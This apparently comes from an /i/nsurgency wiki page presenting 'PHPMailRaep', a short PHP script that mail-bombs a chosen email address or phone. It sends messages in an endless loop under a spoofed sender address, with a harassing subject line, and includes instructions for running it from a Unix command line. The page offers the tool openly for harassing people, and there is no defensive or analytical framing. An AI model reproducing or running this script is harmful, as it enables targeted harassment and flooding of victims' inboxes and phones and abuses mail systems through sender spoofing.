PHPMailRaep

From /i/nsurgency W/i/ki
(Redirected from SMSRaep)
Jump to navigationJump to search

PHPMailRaep is a simple script to spam phones and email addresses.

Code[edit]

<?php
// Simple PHPMailRaep by janus zeal
// irc.netchan.org #insurgency
$to = "email address";
$subject = "asshole of the year";
$message = "haha";
$from = "pedrobear@internet.br";
// From address doesn't have to be valid, but it should look like a real email
// Don't edit below here
$count = 0;
$headers = "From: $from";
while (1) {
        $count++;
        mail($to,$subject,$message,$headers);
        print "Message sent, Now @ " . $count . "\n";
}
?>

Use[edit]

Run from the nix command line, sendmail and php-cgi are required.

php-cgi mail.php

Ctrl-c to exit (Not pretty, I know. :\)